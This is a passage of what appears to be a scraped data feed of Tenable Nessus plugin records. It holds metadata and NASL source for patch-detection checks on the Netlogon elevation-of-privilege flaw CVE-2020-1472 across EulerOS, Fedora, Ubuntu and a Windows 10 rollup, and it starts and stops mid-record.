exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004948'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'14393',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004948])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:48", "description": "According to the version of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-09T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2181)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libsmbclient", "p-cpe:/a:huawei:euleros:libwbclient", "p-cpe:/a:huawei:euleros:samba", "p-cpe:/a:huawei:euleros:samba-client", "p-cpe:/a:huawei:euleros:samba-common", "p-cpe:/a:huawei:euleros:samba-common-tools", "p-cpe:/a:huawei:euleros:samba-libs", "p-cpe:/a:huawei:euleros:samba-winbind", "p-cpe:/a:huawei:euleros:samba-winbind-clients", "p-cpe:/a:huawei:euleros:samba-winbind-modules", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2181.NASL", "href": "https://www.tenable.com/plugins/nessus/141331", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141331);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2181)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2181\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6b24497\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libsmbclient-4.11.6-6.h8.eulerosv2r9\",\n \"libwbclient-4.11.6-6.h8.eulerosv2r9\",\n \"samba-4.11.6-6.h8.eulerosv2r9\",\n \"samba-client-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-tools-4.11.6-6.h8.eulerosv2r9\",\n \"samba-libs-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-clients-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-modules-4.11.6-6.h8.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:28", "description": "According to the version of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-09T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2171)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libsmbclient", "p-cpe:/a:huawei:euleros:libwbclient", "p-cpe:/a:huawei:euleros:samba", "p-cpe:/a:huawei:euleros:samba-client", "p-cpe:/a:huawei:euleros:samba-common", "p-cpe:/a:huawei:euleros:samba-common-tools", "p-cpe:/a:huawei:euleros:samba-libs", "p-cpe:/a:huawei:euleros:samba-winbind", "p-cpe:/a:huawei:euleros:samba-winbind-clients", "p-cpe:/a:huawei:euleros:samba-winbind-modules", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2171.NASL", "href": "https://www.tenable.com/plugins/nessus/141328", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141328);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2171)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2171\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5afe159e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"libsmbclient-4.11.6-6.h8.eulerosv2r9\",\n \"libwbclient-4.11.6-6.h8.eulerosv2r9\",\n \"samba-4.11.6-6.h8.eulerosv2r9\",\n \"samba-client-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-tools-4.11.6-6.h8.eulerosv2r9\",\n \"samba-libs-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-clients-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-modules-4.11.6-6.h8.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:36", "description": "Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-05T00:00:00", "type": "nessus", "title": "Fedora 31 : 2:samba (2020-a1d139381a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:31", "p-cpe:/a:fedoraproject:fedora:2:samba"], "id": "FEDORA_2020-A1D139381A.NASL", "href": "https://www.tenable.com/plugins/nessus/141144", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-a1d139381a.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141144);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"FEDORA\", value:\"2020-a1d139381a\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Fedora 31 : 2:samba (2020-a1d139381a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-a1d139381a\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"samba-4.11.13-0.fc31\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:27", "description": "The remote Ubuntu 16.04 LTS / 18.04 LTS host has packages installed that are affected by a vulnerability as referenced in the USN-4510-1 advisory.\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'. (CVE-2020-1472)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-09-17T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS : Samba vulnerability (USN-4510-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:ctdb", "p-cpe:/a:canonical:ubuntu_linux:libnss-winbind", "p-cpe:/a:canonical:ubuntu_linux:libpam-winbind", "p-cpe:/a:canonical:ubuntu_linux:libparse-pidl-perl", "p-cpe:/a:canonical:ubuntu_linux:libsmbclient", "p-cpe:/a:canonical:ubuntu_linux:libsmbclient-dev", "p-cpe:/a:canonical:ubuntu_linux:libwbclient-dev", "p-cpe:/a:canonical:ubuntu_linux:libwbclient0", "p-cpe:/a:canonical:ubuntu_linux:python-samba", "p-cpe:/a:canonical:ubuntu_linux:registry-tools", "p-cpe:/a:canonical:ubuntu_linux:samba", "p-cpe:/a:canonical:ubuntu_linux:samba-common", "p-cpe:/a:canonical:ubuntu_linux:samba-common-bin", "p-cpe:/a:canonical:ubuntu_linux:samba-dev", "p-cpe:/a:canonical:ubuntu_linux:samba-dsdb-modules", "p-cpe:/a:canonical:ubuntu_linux:samba-libs", "p-cpe:/a:canonical:ubuntu_linux:samba-testsuite", "p-cpe:/a:canonical:ubuntu_linux:samba-vfs-modules", "p-cpe:/a:canonical:ubuntu_linux:smbclient", "p-cpe:/a:canonical:ubuntu_linux:winbind"], "id": "UBUNTU_USN-4510-1.NASL", "href": "https://www.tenable.com/plugins/nessus/140640", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4510-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140640);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"USN\", value:\"4510-1\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS : Samba vulnerability (USN-4510-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS / 18.04 LTS host has packages installed that are affected by a vulnerability as referenced\nin the USN-4510-1 advisory.\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'. (CVE-2020-1472)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4510-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libnss-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpam-winbind\");\n 